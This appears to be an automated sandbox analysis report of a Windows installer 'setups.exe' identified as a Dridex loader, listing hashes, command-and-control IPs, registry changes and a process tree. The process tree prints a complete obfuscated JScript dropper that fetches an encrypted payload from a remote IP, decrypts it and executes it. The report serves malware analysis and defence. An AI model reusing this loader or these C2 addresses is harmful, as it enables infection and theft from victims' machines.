Analysis
-
max time kernel
76s -
max time network
150s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
10-04-2021 06:02
Static task
static1
Behavioral task
behavioral1
Sample
setups.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
setups.exe
Resource
win10v20201028
Errors
General
-
Target
setups.exe
-
Size
2.0MB
-
MD5
2f6511abc3a54d2ecadc0970805a0ad6
-
SHA1
a2b304428f02d9f4b23c24cc7fe80f319a51f204
-
SHA256
be315dc46922d27c67a50ebadaa0d47425f89108c5657841aaee35ae5375ec7e
-
SHA512
81165db7fd648f1944b3365722baff3884bebb8328c901a8e3e80c318ebba4c88c092df3982eaf013b3757047442a8fed93048222c5a757d45185bd93c835638
Malware Config
Extracted
dridex
10111
131.100.24.231:443
188.165.17.91:8443
185.148.169.10:2303
Signatures
-
Processes:
resource yara_rule behavioral1/memory/1980-88-0x0000000000400000-0x0000000000463000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 38 344 wscript.exe -
Executes dropped EXE 2 IoCs
Processes:
setups.tmp8sjtl.exepid process 2032 setups.tmp 1980 8sjtl.exe -
Loads dropped DLL 7 IoCs
Processes:
setups.exesetups.tmpcmd.exepid process 1828 setups.exe 2032 setups.tmp 2032 setups.tmp 2032 setups.tmp 2032 setups.tmp 1688 cmd.exe 1688 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "324806549" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AE9FC111-99D2-11EB-B37E-EE45CAFA0C11} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
setups.tmppid process 2032 setups.tmp -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1252 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1252 iexplore.exe 1252 iexplore.exe 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
setups.exesetups.tmpiexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 1828 wrote to memory of 2032 1828 setups.exe setups.tmp PID 2032 wrote to memory of 1252 2032 setups.tmp iexplore.exe PID 2032 wrote to memory of 1252 2032 setups.tmp iexplore.exe PID 2032 wrote to memory of 1252 2032 setups.tmp iexplore.exe PID 2032 wrote to memory of 1252 2032 setups.tmp iexplore.exe PID 1252 wrote to memory of 1312 1252 iexplore.exe IEXPLORE.EXE PID 1252 wrote to memory of 1312 1252 iexplore.exe IEXPLORE.EXE PID 1252 wrote to memory of 1312 1252 iexplore.exe IEXPLORE.EXE PID 1252 wrote to memory of 1312 1252 iexplore.exe IEXPLORE.EXE PID 1312 wrote to memory of 1844 1312 IEXPLORE.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 IEXPLORE.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 IEXPLORE.EXE cmd.exe PID 1312 wrote to memory of 1844 1312 IEXPLORE.EXE cmd.exe PID 1844 wrote to memory of 344 1844 cmd.exe wscript.exe PID 1844 wrote to memory of 344 1844 cmd.exe wscript.exe PID 1844 wrote to memory of 344 1844 cmd.exe wscript.exe PID 1844 wrote to memory of 344 1844 cmd.exe wscript.exe PID 344 wrote to memory of 1688 344 wscript.exe cmd.exe PID 344 wrote to memory of 1688 344 wscript.exe cmd.exe PID 344 wrote to memory of 1688 344 wscript.exe cmd.exe PID 344 wrote to memory of 1688 344 wscript.exe cmd.exe PID 1688 wrote to memory of 1980 1688 cmd.exe 8sjtl.exe PID 1688 wrote to memory of 1980 1688 cmd.exe 8sjtl.exe PID 1688 wrote to memory of 1980 1688 cmd.exe 8sjtl.exe PID 1688 wrote to memory of 1980 1688 cmd.exe 8sjtl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setups.exe"C:\Users\Admin\AppData\Local\Temp\setups.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-JFOHI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JFOHI.tmp\setups.tmp" /SL5="$5015C,1873631,71168,C:\Users\Admin\AppData\Local\Temp\setups.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1252 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDY2OTk3&xJesS&oa1n4=xHrQMrLYbRzFFYHfLf_KRqFbNU&s2ht4=vRGUWVxoqbk63PE5qpZDXGpbf1DBmgqVmAH1m-t_d0erFOfQe5zUawcwE3n40MVl5Foaqt2kKByhXOgJSFqBaIMg5Bq5GUELVv2F6jnbVHdM8hxBKG7GUB_OkZV14gvAlTn637&NFRqIUAsMTU1NQ==" "2""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDY2OTk3&xJesS&oa1n4=xHrQMrLYbRzFFYHfLf_KRqFbNU&s2ht4=vRGUWVxoqbk63PE5qpZDXGpbf1DBmgqVmAH1m-t_d0erFOfQe5zUawcwE3n40MVl5Foaqt2kKByhXOgJSFqBaIMg5Bq5GUELVv2F6jnbVHdM8hxBKG7GUB_OkZV14gvAlTn637&NFRqIUAsMTU1NQ==" "2""6⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c 8sjtl.exe7⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8sjtl.exe8sjtl.exe8⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015MD5
61a03d15cf62612f50b74867090dbe79
SHA115228f34067b4b107e917bebaf17cc7c3c1280a8
SHA256f9e23dc21553daa34c6eb778cd262831e466ce794f4bea48150e8d70d3e6af6d
SHA5125fece89ccbbf994e4f1e3ef89a502f25a72f359d445c034682758d26f01d9f3aa20a43010b9a87f2687da7ba201476922aa46d4906d442d56eb59b2b881259d3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
29e8ed999dfd143c9492eeab3f2ea2b7
SHA10112b60dfcca7c0de3fe90411c805c7f406173f0
SHA2563ba6b9a2edf5a33f3f8e61691c2442b556581e44568c3fd39a598ef37bda4800
SHA5124d8b479d1811b200b76c75ed4f8e6d6201396c5a62ebd5c88a1e3ec4571b1422d6af239e19f21f5aa0c09f0883bebc1d5474c630a2c9590856ff760f85ce7712
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\8sjtl.exeMD5
2cefacbc9b7534945d6472b2486df1d6
SHA1c53404ea93b12e083ab9ea6a51fbe3e89eab59df
SHA25666e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf
SHA5122b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059
-
C:\Users\Admin\AppData\Local\Temp\8sjtl.exeMD5
2cefacbc9b7534945d6472b2486df1d6
SHA1c53404ea93b12e083ab9ea6a51fbe3e89eab59df
SHA25666e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf
SHA5122b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059
-
C:\Users\Admin\AppData\Local\Temp\is-JFOHI.tmp\setups.tmpMD5
ffea47ed33ad5876771da0d9d4489e7b
SHA1b79481ec06a71ce81255fdef3cfab55e07a99eaa
SHA256d65548988a58773251e1d193a243ca98d5ee74fa371e0b47b759bb061c00f6c3
SHA51227ec2cbc8e445080927ffb5408eaaf0fb8c0f6535f70201edebc1e44c21000185b92fd783f8dd5c4ef89a845a92a71feb75dd46290982b1bdbe271d2067d3f09
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ZJCHJZ48.txtMD5
b34bb21d2abb4a9b0f99d4567937a671
SHA1e52b79811481473f5a5bed1c193c8bc6305739e1
SHA2561f9761e45bbb80a63b43ee53ecd6d0c9d8e029ca92fe32ceb005de9c861b684e
SHA512e5e7133b5c119c47894a6a1421afb2ded44327b7713b7b877ccc308859da2733ad1bf15db9c0710002e12f653a2aaa77387ec04428301b687f58619128bee612
-
\Users\Admin\AppData\Local\Temp\8sjtl.exeMD5
2cefacbc9b7534945d6472b2486df1d6
SHA1c53404ea93b12e083ab9ea6a51fbe3e89eab59df
SHA25666e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf
SHA5122b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059
-
\Users\Admin\AppData\Local\Temp\8sjtl.exeMD5
2cefacbc9b7534945d6472b2486df1d6
SHA1c53404ea93b12e083ab9ea6a51fbe3e89eab59df
SHA25666e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf
SHA5122b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059
-
\Users\Admin\AppData\Local\Temp\is-7QHEO.tmp\_isetup\_isdecmp.dllMD5
fd4743e2a51dd8e0d44f96eae1853226
SHA1646cef384e949aaf61e6d0b243d8d84ab04e79b7
SHA2566535ba91fcca7174c3974b19d9ab471f322c2bf49506ef03424517310080be1b
SHA5124587c853871624414e957f083713ec62d50c46b7041f83faa45dbf99b99b8399fc08d586d240e4bccee5eb0d09e1cdcb3fd013f07878adf4defcc312712e468d
-
\Users\Admin\AppData\Local\Temp\is-7QHEO.tmp\idp.dllMD5
b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
\Users\Admin\AppData\Local\Temp\is-7QHEO.tmp\itdownload.dllMD5
d82a429efd885ca0f324dd92afb6b7b8
SHA186bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea
SHA256b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3
SHA5125bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df
-
\Users\Admin\AppData\Local\Temp\is-7QHEO.tmp\psvince.dllMD5
d726d1db6c265703dcd79b29adc63f86
SHA1f471234fa142c8ece647122095f7ff8ea87cf423
SHA2560afdfed86b9e8193d0a74b5752a693604ab7ca7369d75136899ff8b08b8c5692
SHA5128cccbff39939bea7d6fe1066551d65d21185cef68d24913ea43f24b8f4e08a5581a9f662061611b15b5248f5f0d541e98d6f70164aaaad14d0856e76fabbfaa4
-
\Users\Admin\AppData\Local\Temp\is-JFOHI.tmp\setups.tmpMD5
ffea47ed33ad5876771da0d9d4489e7b
SHA1b79481ec06a71ce81255fdef3cfab55e07a99eaa
SHA256d65548988a58773251e1d193a243ca98d5ee74fa371e0b47b759bb061c00f6c3
SHA51227ec2cbc8e445080927ffb5408eaaf0fb8c0f6535f70201edebc1e44c21000185b92fd783f8dd5c4ef89a845a92a71feb75dd46290982b1bdbe271d2067d3f09
-
memory/344-77-0x0000000000000000-mapping.dmp
-
memory/1252-74-0x0000000000000000-mapping.dmp
-
memory/1312-75-0x0000000000000000-mapping.dmp
-
memory/1688-80-0x0000000000000000-mapping.dmp
-
memory/1828-60-0x00000000760A1000-0x00000000760A3000-memory.dmpFilesize
8KB
-
memory/1828-61-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/1844-76-0x0000000000000000-mapping.dmp
-
memory/1980-87-0x0000000000230000-0x000000000026C000-memory.dmpFilesize
240KB
-
memory/1980-84-0x0000000000000000-mapping.dmp
-
memory/1980-88-0x0000000000400000-0x0000000000463000-memory.dmpFilesize
396KB
-
memory/2032-68-0x0000000000240000-0x0000000000241000-memory.dmpFilesize
4KB
-
memory/2032-63-0x0000000000000000-mapping.dmp
-
memory/2032-71-0x0000000000720000-0x000000000075C000-memory.dmpFilesize
240KB
-
memory/2032-73-0x00000000005F0000-0x00000000005FE000-memory.dmpFilesize
56KB